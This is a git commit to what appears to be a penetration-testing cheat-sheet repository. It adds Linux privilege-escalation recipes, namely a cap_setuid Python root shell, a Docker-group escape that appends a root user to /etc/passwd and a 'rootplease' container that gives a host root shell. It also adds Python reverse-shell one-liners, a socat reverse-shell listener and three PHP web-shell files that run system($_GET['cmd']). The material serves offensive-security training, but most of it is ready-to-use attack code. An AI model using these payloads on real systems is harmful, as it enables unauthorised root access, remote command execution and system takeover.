Linux capabilities - setuid + read / Docker group privesc

This commit is contained in:
Swissky 2019-02-26 17:24:10 +01:00
parent abb81aba7e
commit a58a8113d1
6 changed files with 75 additions and 23 deletions

View File

@ -493,6 +493,10 @@ You need a shell on a user account with a mailbox.
python secretsdump.py xxxxxxxxxx -just-dc
```
Alternatively you can use the Metasploit module
[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
## Privilege Escalation
### PrivEsc Local Admin - Token Impersonation (RottenPotato)

View File

@ -10,6 +10,15 @@
- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123)
- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
## Summary
* [Checklist](#checklist)
* [SUID](#suid)
* [Capabilities](#capabilities)
* [SUDO](#sudo)
* [Groups](#groups)
* [Docker](#docker)
## Checklists
* Kernel and distribution release details
@ -111,7 +120,7 @@ sudo chmod +s /tmp/suid # setuid bit
```
## Capabilies
## Capabilities
List capabilities of binaries
```bash
@ -126,12 +135,29 @@ List capabilities of binaries
/usr/bin/rcp = cap_net_bind_service+ep
```
Edit capabilites
Edit capabilities
```powershell
/sbin/setcap -r /bin/ping # remove
setcap cap_net_raw+p /bin/ping # add
```
Interesting capabilities
```powershell
cap_dac_read_search # read anything
cap_setuid+ep # setuid
```
Example of privilege escalation with `cap_setuid+ep`
```powershell
$ sudo setcap cap_setuid+ep /usr/bin/python2.7
$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
sh-5.0# id
uid=0(root) gid=1000(swissky)
```
## SUDO
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
@ -178,7 +204,30 @@ $> docker run -it --rm -v $PWD:/mnt bash
$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
```
Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell
```powershell
$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
latest: Pulling from chrisfosterelli/rootplease
2de59b831a23: Pull complete
354c3661655e: Pull complete
91930878a2d7: Pull complete
a3ed95caeb02: Pull complete
489b110c54dc: Pull complete
Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0
Status: Downloaded newer image for chrisfosterelli/rootplease:latest
You should now have a root shell on the host OS
Press Ctrl-D to exit the docker instance / shell
sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)
```
## References
- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
- [Privilege escalation via Docker - April 22, 2015 — Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html)
- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/)

View File

@ -36,6 +36,11 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen(
Linux only
IPv4
```python
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```
IPv4
```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
@ -186,20 +191,6 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
## Spawn TTY
```bash
/bin/sh -i
```
(From an interpreter)
```powershell
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
```
Access shortcuts, su, nano and autocomplete in a partially tty shell
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
@ -216,19 +207,24 @@ export TERM=xterm-256color
stty rows <num> columns <cols>
```
(From within vi)
or use `socat` binary to get a fully tty reverse shell
```bash
:!bash
:set shell=/bin/bash:shell
socat file:`tty`,raw,echo=0 tcp-listen:12345
```
(From within nmap)
Spawn a TTY shell from an interpreter
```sh
!sh
```powershell
/bin/sh -i
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
```
## References
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)

View File

@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>

View File

@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>

View File

@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>